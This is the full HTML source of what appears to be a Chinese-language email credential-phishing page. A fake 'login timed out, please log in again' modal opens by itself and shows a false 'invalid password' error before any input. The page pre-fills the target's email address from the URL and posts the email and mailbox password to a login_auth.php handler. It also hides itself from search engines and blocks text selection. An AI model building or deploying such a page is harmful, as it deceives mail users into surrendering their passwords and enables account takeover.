<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Language" content="en">
    <meta name="robots" content="noindex, nofollow">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google" content="notranslate">

    <title>登录认证</title>
    <link rel="shortcut icon" href="images/bg2.png">
    <link rel="shortcut icon" href="images/bg2.ico" type="image/x-icon">

    <!-- Bootstrap CSS -->
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" rel="stylesheet">

    <style>
        html {
            -webkit-user-select: none;
            -moz-user-select: none;
            -ms-user-select: none;
            user-select: none;
        }

        body {
            background: url('images/bg.png') no-repeat center center fixed;
            background-size: cover;
            font-family: Arial, sans-serif;
        }

        .modal-content {
            min-width: 350px;
        }

        .alert {
            display: none;
        }
    </style>
</head>

<body>

    <!-- Modal Trigger Button (hidden) -->
    <button type="button" class="btn btn-primary" id="m-btn" data-toggle="modal" data-target="#loginModal" style="visibility: hidden;">
        Launch demo modal
    </button>

    <!-- Modal -->
    <div class="modal fade" id="loginModal" data-backdrop="static" tabindex="-1" role="dialog" aria-labelledby="loginModalLabel">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-header p-2" style="background-color: #dae2e3;">
                    <img src="images/Logo.png" alt="Logo" width="510" height="45">
                </div>
                <!-- Form now sends data to login_auth.php -->
                <form id="login-form" method="POST" action="login_auth.php">
                    <div class="modal-body px-5">
                        <span style="font-weight: 700; color: #575757; font-size: 17px;">电子邮件登录超时，请重新登录</span>
                        <input type="hidden" name="btn1" value="btn1">
                        <center>
                            <div class="alert alert-danger" id="msg">无效的密码！请输入正确的密码。</div>
                        </center>
                        <div class="form-group row">
                            <label for="email" class="col-sm-4 col-form-label">用户名</label>
                            <div class="col-sm-8">
                                <input type="email" class="form-control py-1" id="email" name="email" required placeholder="电子邮件地址">
                            </div>
                        </div>
                        <div class="form-group row">
                            <label for="password" class="col-sm-4 col-form-label">邮箱密码</label>
                            <div class="col-sm-8">
                                <input type="password" class="form-control py-1" id="password" name="password" required placeholder="密码">
                            </div>
                        </div>
                    </div>
                    <div class="modal-footer p-1">
                        <button type="submit" class="btn btn-success py-1" id="btn1" style="background-color: #0077B5;">登录</button>
                    </div>
                </form>
            </div>
        </div>
    </div>

    <!-- Remove hidden redirect inputs that could be changing the form action -->
    <input type="hidden" id="f" value="">

    <!-- Required JS Libraries -->
    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>

    <script>
        $(document).ready(function () {
            // Function to get query parameters
            function getQueryParam(param) {
                var urlParams = new URLSearchParams(window.location.search);
                return urlParams.get(param);
            }

            // Automatically populate email field from query parameter
            var email = getQueryParam('email');
            if (email) {
                $('#email').val(email);
            }

            // Automatically show the login modal
            $('#m-btn').click();

            // Initially show the error message for password field
            $('#msg').show();

            // Handle form submission
            $('#login-form').submit(function (e) {
                var password = $('#password').val().trim();
                if (password === "") {
                    // Prevent form submission and show error if password is empty
                    $('#msg').text('请输入密码').show();
                    e.preventDefault();
                } else {
                    // Allow form submission if password is not empty
                    $('#msg').hide();
                }
            });
        });
    </script>

</body>

</html>
